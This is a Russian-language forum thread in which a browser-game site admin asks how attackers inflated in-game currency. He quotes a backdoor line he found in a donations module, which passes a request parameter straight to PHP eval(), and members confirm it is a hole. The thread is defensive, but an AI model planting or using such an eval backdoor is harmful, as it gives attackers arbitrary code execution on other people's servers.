Народ помогите советом !

  • Автор темы nikitin2016
  • Дата начала
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
Коллеги админы ферм , не давно один упырь мне серебро накрутил в ферме и на вывод и на покупки, пользователя естественно забанил к чертям , но... подскажите ! В каких файлах прежде всего смотреть на стандартной ферме , чтобы устранить эти уязвимости ?
 
GLookin
GLookin
Участник
Сообщения
296
Реакции
62
nikitin2016 написал(а):
Коллеги админы ферм , не давно один упырь мне серебро накрутил в ферме и на вывод и на покупки, пользователя естественно забанил к чертям , но... подскажите ! В каких файлах прежде всего смотреть на стандартной ферме , чтобы устранить эти уязвимости ?
Нажмите для раскрытия...
Во всех. Если есть, хотя бы в одном из них уязвимость на SQL-инъекции, то через нее можно спокойно накрутить серебро.
 
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
GLookin написал(а):
Во всех. Если есть, хотя бы в одном из них уязвимость на SQL-инъекции, то через нее можно спокойно накрутить серебро.
Нажмите для раскрытия...
Скажите пожалуйста, вот нашел этот как мне показалось странный код в модуле "Пожертвования" это уязвимость или нет ? Вроде проверил пожертвования проходят норм без этого кода

код :

if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
 
GLookin
GLookin
Участник
Сообщения
296
Реакции
62
nikitin2016 написал(а):
Скажите пожалуйста, вот нашел этот как мне показалось странный код в модуле "Пожертвования" это уязвимость или нет ? Вроде проверил пожертвования проходят норм без этого кода

код :

if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
Нажмите для раскрытия...
Да, это дыра.
Еще в файле TOP админки есть, насколько помню.
 
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
GLookin написал(а):
Да, это дыра.
Еще в файле TOP админки есть, насколько помню.
Нажмите для раскрытия...
этой дырой можно было серебро накрутить ? А то мне накрутили миллионы серебра уроды !
 
M
MegaGoblin
PHP, JS, AJAX, CSS, HTML
Участник
Сообщения
322
Реакции
72
nikitin2016 написал(а):
этой дырой можно было серебро накрутить ? А то мне накрутили миллионы серебра уроды !
Нажмите для раскрытия...
Этой дырой можно все что угодно сделать с твоей фермой.
 
genom2160
genom2160
Участник
Сообщения
7
Реакции
0
Народ подскажите!Как сделать например 50% плюсом к пополнению баланса в ферме?
 
ZLODEY
ZLODEY
Местный
Сообщения
82
Реакции
3
У меня есть защита против накрутки, если кто то попытался накрутить серебро его система автоматически блокирует гы))
 
М
Михаил77
Участник
Сообщения
20
Реакции
0
genom2160 написал(а):
Народ подскажите!Как сделать например 50% плюсом к пополнению баланса в ферме?
Нажмите для раскрытия...
это делается в файле payeer_merchant.php
 
Войдите или зарегистрируйтесь для ответа.
Сверху